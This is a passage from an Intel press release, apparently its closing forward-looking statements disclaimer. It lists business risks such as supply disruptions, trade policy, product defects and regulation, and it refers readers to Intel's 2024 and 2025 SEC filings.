foundries, including from disruptions, delays, trade tensions and conflicts, or shortages; recently elevated geopolitical tensions, volatility and uncertainty with respect to international trade policies, including tariffs and export controls, impacting Intel’s business, the markets in which it competes and the world economy; product defects, errata and other product issues, particularly as Intel develops next-generation products and implements next-generation manufacturing process technologies; potential security vulnerabilities in Intel’s products; increasing and evolving cybersecurity threats and privacy risks; IP risks including related litigation and regulatory proceedings; the need to attract, retain, and motivate key talent; Intel’s debt obligations and its ability to access sources of capital; complex and evolving laws and regulations across many jurisdictions; fluctuations in currency exchange rates; changes in Intel’s effective tax rate; catastrophic events; environmental, health, safety, and product regulations; and other risks and uncertainties described in this release and Intel’s 2024 Form 10-K, Q1 2025 Form 10-Q, Q2 2025 Form 10-Q, and other filings with the SEC. Readers are cautioned not to place undue reliance on these forward-looking statements, which speak only as of the date they were first made. Intel does not undertake, and expressly disclaims any duty, to update such statements, whether as a result of new information, new developments, or otherwise, except to the extent that disclosure may be required by law.